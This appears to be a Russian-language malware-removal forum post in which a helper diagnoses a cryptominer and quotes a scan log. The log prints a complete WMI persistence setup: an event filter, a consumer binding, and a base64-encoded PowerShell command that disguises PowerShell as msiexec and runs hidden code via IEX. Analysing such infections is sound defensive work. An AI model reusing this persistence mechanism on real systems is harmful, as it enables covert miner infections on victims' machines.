похоже, здесь используется запуск через WMI закодированного скрипта, возможно именно этот скрипт содержит запуск майнера, связанного с процессом msiexec
Цитата |
---|
Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE Имя файла POWERSHELL.EXE Тек. статус ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную] Сохраненная информация на момент создания образа Статус ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную] File_Id 4A5BC7F377000 Linker 9.0 Размер 473600 байт Создан 14.07.2009 в 03:49:07 Изменен 14.07.2009 в 05:39:20 TimeStamp 13.07.2009 в 23:49:07 EntryPoint + OS Version 0.1 Subsystem Windows character-mode user interface (CUI) subsystem IMAGE_FILE_DLL - IMAGE_FILE_EXECUTABLE_IMAGE + Тип файла 64-х битный ИСПОЛНЯЕМЫЙ Цифр. подпись Действительна, подписано Microsoft Windows Оригинальное имя PowerShell.EXE.MUI Версия файла 6.1.7600.16385 (win7_rtm.090713-1255) Описание Windows PowerShell Производитель Microsoft Corporation Доп. информация на момент обновления списка SHA1 5330FEDAD485E0E4C23B2ABE1075A1F984FDE9FC MD5 852D67A27E454BD389FA7F02A8CBE23F Namespace \\.\root\subscription Consumer_Name FsxxleConsumer Consumer_Class CommandLineEventConsumer Consumer_CommandLineTemplatepowershell -exec bypass -W 1 -E aQBmACAAKAAoAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAG0AcwBpAGUAeABlAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuAFAAYQB0AGgAIAAtAGUAcQAgACgAZABpAHIAIABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKQAuAFYAYQBsAHUAZQArACcAXABQAGEAbgB0AGgAZQByAFwAbQBzAGkAZQB4AGUAYwAuAGUAeABlACcAKQB7AGUAeABpAHQAfQBlAGwAcwBlAHsAUwB0AG8AcAAtAFAAcgBvAGMAZQBzAHMAIAAtAG4AYQBtAGUAIABtAHMAaQBlAHgAZQBjACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHgAbQByAGkAZwAgAC0ARgBvAHIAYwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBkACAAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUABhAG4AdABoAGUAcgA7AGMAbwBwAHkAIAAkAGUAbgB2ADoAdwBpAG4AZABpAHIAXABzAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAAbQBzAGkAZQB4AGUAYwAuAGUAeABlACAALQBlAGEAIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBvAHAAeQAgACQAZQBuAHYAOgB3AGkAbgBkAGkAcgBcAFMAeQBzAFcATwBXADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIABtAHMAaQBlAHgAZQBjAC4AZQB4AGUAIAAtAGUAYQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBzAHQAYQByAHQALQBwAHIAbwBjAGUAcwBzACAALgBcAG0AcwBpAGUAeABlAGMALgBlAHgAZQAgAHsAJABXAG0AaQBOAGEAbQBlAD0AJwByAG8AbwB0AFwAYwBpAG0AdgAyADoAVwBpAG4AMwAyAF8AUwB5AHMAQwBvAG0AbQBhAG4AZAAnADsAJABXAG0AaQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMAKAAkAFcAbQBpAE4AYQBtAGUAKQA7ACQARgA9ACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAkAFcAbQBpAE4AYQBtAGUAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAEYAJwBdAC4AVgBhAGwAdQBlADsASQBFAFgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQARgApACkAKQB9ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABoAGkAZABkAGUAbgB9ADsAZQB4AGkAdAA= Filter_Name FsxxleFilter Filter_Class __EventFilter Filter_Query SELECT * FROM __InstanceModificationEvent WITHIN 720 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' #MOF_Bind# instance of __FilterToConsumerBinding { Consumer = "CommandLineEventConsumer.Name="FsxxleConsumer""; Filter = "__EventFilter.Name="FsxxleFilter""; };
#MOF_Event# instance of __EventFilter { EventNamespace = "root\\cimv2"; Name = "FsxxleFilter"; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 720 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"; QueryLanguage = "WQL"; };
#MOF_Consumer# instance of CommandLineEventConsumer { CommandLineTemplate = "powershell -exec bypass -W 1 -E aQBmACAAKAAoAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAG0AcwBpAGUAeABlAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuAFAAYQB0AGgAIAAtAGUAcQAgACgAZABpAHIAIABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKQAuAFYAYQBsAHUAZQArACcAXABQAGEAbgB0AGgAZQByAFwAbQBzAGkAZQB4AGUAYwAuAGUAeABlACcAKQB7AGUAeABpAHQAfQBlAGwAcwBlAHsAUwB0AG8AcAAtAFAAcgBvAGMAZQBzAHMAIAAtAG4AYQBtAGUAIABtAHMAaQBlAHgAZQBjACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHgAbQByAGkAZwAgAC0ARgBvAHIAYwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBkACAAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUABhAG4AdABoAGUAcgA7AGMAbwBwAHkAIAAkAGUAbgB2ADoAdwBpAG4AZABpAHIAXABzAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAAbQBzAGkAZQB4AGUAYwAuAGUAeABlACAALQBlAGEAIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBvAHAAeQAgACQAZQBuAHYAOgB3AGkAbgBkAGkAcgBcAFMAeQBzAFcATwBXADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIABtAHMAaQBlAHgAZQBjAC4AZQB4AGUAIAAtAGUAYQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBzAHQAYQByAHQALQBwAHIAbwBjAGUAcwBzACAALgBcAG0AcwBpAGUAeABlAGMALgBlAHgAZQAgAHsAJABXAG0AaQBOAGEAbQBlAD0AJwByAG8AbwB0AFwAYwBpAG0AdgAyADoAVwBpAG4AMwAyAF8AUwB5AHMAQwBvAG0AbQBhAG4AZAAnADsAJABXAG0AaQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMAKAAkAFcAbQBpAE4AYQBtAGUAKQA7ACQARgA9ACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAkAFcAbQBpAE4AYQBtAGUAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAEYAJwBdAC4AVgBhAGwAdQBlADsASQBFAFgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQARgApACkAKQB9ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABoAGkAZABkAGUAbgB9ADsAZQB4AGkAdAA="; Name = "FsxxleConsumer"; }; |